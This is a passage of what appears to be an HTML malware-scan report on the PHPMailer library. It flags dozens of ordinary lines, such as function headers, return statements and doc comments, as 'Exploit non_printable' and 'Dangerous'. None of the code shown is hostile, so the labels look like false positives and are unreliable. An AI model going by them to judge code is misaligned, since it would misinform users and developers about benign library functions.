<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3541</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3578</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3640</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3671</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3693</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3911</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
